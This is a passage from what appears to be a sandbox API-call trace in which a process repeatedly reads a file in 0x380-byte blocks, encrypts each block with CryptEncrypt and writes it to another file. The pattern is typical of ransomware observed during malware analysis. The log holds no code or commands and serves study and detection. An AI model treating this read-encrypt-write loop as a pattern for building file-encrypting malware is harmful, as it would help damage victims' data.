lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.607] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.607] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.607] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.607] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.607] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.607] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.608] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.608] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.608] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.608] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.608] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.608] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.612] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.612] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.612] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.612] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.613] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.613] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.613] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.613] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.613] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.613] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.613] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.613] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.613] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.613] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.613] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.613] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.613] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.613] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.614] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.614] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.614] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.614] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.614] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.614] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.614] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.614] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.614] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.615] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.615] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.615] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.615] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.615] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.615] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.615] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.615] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.615] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.615] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.615] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.615] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.616] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.616] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.616] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.616] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.616] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.616] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.616] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.616] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.616] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.616] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.616] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.616] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.617] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.617] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.617] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.617] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.617] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.617] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.617] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.617] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.617] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.617] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.617] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.617] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.618] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.618] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.618] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.618] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.618] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.618] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.618] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.618] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.618] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.618] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.618] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.627] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.636] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.636] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.637] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.637] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.637] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.637] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.637] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.637] CryptEncrypt (in: hKey=0x2fc6c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.637] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.637] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8, 